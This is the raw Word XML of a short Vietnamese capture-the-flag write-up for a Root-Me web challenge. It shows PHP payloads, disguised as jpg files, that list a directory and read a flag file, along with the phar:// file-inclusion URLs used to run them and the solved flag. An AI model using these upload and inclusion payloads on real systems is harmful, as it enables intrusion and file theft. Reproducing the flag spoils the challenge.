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251B" w14:textId="39850753" w:rsidR="00856BCA" w:rsidRDefault="00856BCA" w:rsidP="00B90A63">
      <w:r>
        <w:t>Đầu tiên vào trang ta thấy không filter input file ta thực hiện tấn công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F76C7E1" w14:textId="7D4A3C39" w:rsidR="00856BCA" w:rsidRDefault="00856BCA" w:rsidP="00B90A63">
      <w:r>
        <w:t>Tạo payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB4485" w14:textId="7C476DBF" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F578FE" w14:textId="089D7DAE" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>$dir = "/challenge/web-serveur/ch43/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="210F2F28" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>if (is_dir($dir</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2628AFA7" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>if ($dh = opendir($dir</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BEF7EFA" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>while (($file = readdir($dh)) !== false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36BAE3" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>echo "filename:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$file. "&lt;br&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00E2FEAB" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AB5B5E" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>closedir($dh</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="613797C5" w14:textId="20CD1500" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC65156" w14:textId="77777777" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70E13C" w14:textId="23F5569D" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="00B90A63">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC11F2F" w14:textId="57D62D9B" w:rsidR="00856BCA" w:rsidRDefault="00856BCA" w:rsidP="00B90A63">
      <w:r>
        <w:t>Chuyển đổi thành jpg và gửi lên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42832E18" w14:textId="738BF632" w:rsidR="00C54FA4" w:rsidRDefault="001245AD">
      <w:r w:rsidRPr="001245AD">
        <w:t>yzA9v2EZo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35479B1B" w14:textId="5296C469" w:rsidR="001245AD" w:rsidRDefault="001245AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A6C639C" wp14:editId="0FB82297">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="38208910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9105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D751" w14:textId="2E7DD365" w:rsidR="00856BCA" w:rsidRDefault="00856BCA">
      <w:r>
        <w:t>Xem file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017924FC" w14:textId="21AAB3EA" w:rsidR="001245AD" w:rsidRDefault="001245AD">
      <w:r w:rsidRPr="001245AD">
        <w:lastRenderedPageBreak/>
        <w:t>http://challenge01.root-me.org/web-serveur/ch43/index.php?page=phar://tmp/upload/yzA9v2EZo.jpg/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B1462" w14:textId="2C239765" w:rsidR="001245AD" w:rsidRDefault="001245AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12767BF7" wp14:editId="3B6D182F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1574050183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50183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BF07" w14:textId="52C5861B" w:rsidR="00856BCA" w:rsidRDefault="00856BCA">
      <w:r>
        <w:t xml:space="preserve">Tên file flag trên hình, tạo payload và gửi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE07CC1" w14:textId="4119F11D" w:rsidR="00856BCA" w:rsidRDefault="00856BCA">
      <w:r w:rsidRPr="00856BCA">
        <w:t>&lt;?php $data = file_get_contents("flag-mipkBswUppqwXlq9ZydO.php"); echo $data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00856BCA">
        <w:t>; ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00856BCA">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF154A" w14:textId="0D7ABFD4" w:rsidR="00856BCA" w:rsidRDefault="00B90A63" w:rsidP="001245AD">
      <w:r w:rsidRPr="00B90A63">
        <w:t>UBLSjyMjH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391DEE60" w14:textId="5735E828" w:rsidR="00856BCA" w:rsidRDefault="00856BCA" w:rsidP="001245AD">
      <w:r w:rsidRPr="00856BCA">
        <w:t>http://challenge01.root-me.org/web-serveur/ch43/index.php?page=phar://tmp/upload/UBLSjyMjH.jpg/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317814F3" w14:textId="4EA083DA" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="001245AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DA79CE3" wp14:editId="15C659DF">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="167097166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1660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1216" w14:textId="4E2D21CB" w:rsidR="00856BCA" w:rsidRDefault="00856BCA" w:rsidP="001245AD">
      <w:r w:rsidRPr="00856BCA">
        <w:t>lf1-Wr4pp3r_Ph4R_pwn3d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB95A31" w14:textId="147F527B" w:rsidR="00B90A63" w:rsidRDefault="00B90A63" w:rsidP="001245AD">
      <w:r>
        <w:t xml:space="preserve">Do làm nhiều lân nên có thể mã bị thay </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>đổi</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00B9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40"/>
    <w:rsid w:val="001245AD"/>
    <w:rsid w:val="00856BCA"/>
    <w:rsid w:val="008B4740"/>
    <w:rsid w:val="00B90A63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3020"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{27B8D1D2-47F9-4BEE-B974-0D5427A7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2023-04-14T18:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-14T18:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>